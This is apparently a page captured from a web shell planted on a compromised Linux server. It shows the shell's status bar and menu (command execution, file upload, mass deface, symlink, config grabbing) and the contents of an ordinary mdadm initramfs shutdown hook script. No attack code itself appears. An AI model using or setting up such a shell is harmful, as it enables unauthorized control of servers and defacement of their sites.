OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /libx32/../share/zsh/../publicsuffix/../initramfs-tools/../finalrd/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
#!/bin/sh # SPDX-License-Identifier: GPL-3.0-only set -e if [ "$1" = "setup" ] then . /usr/share/initramfs-tools/hook-functions copy_exec /sbin/mdadm copy_exec /sbin/mdmon exit 0 fi mdmon --all --takeover mdadm -vv --wait-clean --scan mdadm -vv --stop --scan